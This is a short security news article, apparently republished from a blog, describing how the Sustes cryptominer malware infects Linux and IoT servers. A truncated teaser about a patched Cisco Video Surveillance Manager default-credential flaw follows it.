Custom Sustes Malware Infects Linux and IoT Servers Worldwide

Haythem Elmir

The Sustes malware is a custom virus that was recently discovered in a global infection. It infects via a unique mechanism and is designed to load a cryptocurrency miner infection onto the target systems. At the moment the made impact cannot be determined.

The Custom Sustes Malware Infects Servers With Miner Code

A recently published security report has revealed a new threat identified as the Sustes malware. It is of interest by the specialists as Sustes is entirely custom made by an unknown hacker or criminal collective. What’s particularly interesting about it is the way it is distributed — it doesn’t infect directly via a worm or a direct injection. The victim hosts so far showcase that the targets are mainly Linux and IoT servers. The infection happens through exploitation and brute force attempts of servers. A script is being launched which will drop and execute other software including a dropper.

The procedure launches a complex behavior pattern:

  • The first actions are related to a stealth protection technique. It will scan for applications and services that may be found on the target systems. Using application signatures the malicious engine will identify if such software is installed.
  • Network connections will be evaluated and those connecting to specific addresses will be killed.
  • When these two commands have been complete the payload dropper will be initiated and download the Sustes malware to the target hosts.
  • A cron tab will be set up to periodically execute malware code.

The custom Sustes malware will download a configuration file from a remote server featuring several wallet addresses. This is part of the cryptocurrency miner deployment process which will install a Monero-based application. The analysis of the addresses has lead the security analysts into […]

To read the original article:


Laisser un commentaire

Next Post

Cisco Patched Critical Vulnerability With Video Surveillance Manager Appliance

Cisco patched a critical security vulnerability with Cisco Video Surveillance Manager (VSM) that allows an unauthenticated remote attacker to gain access to the vulnerable system as a root user, which has a default, static user credentials. This vulnerability could be exploited by an attacker by using the account to log […]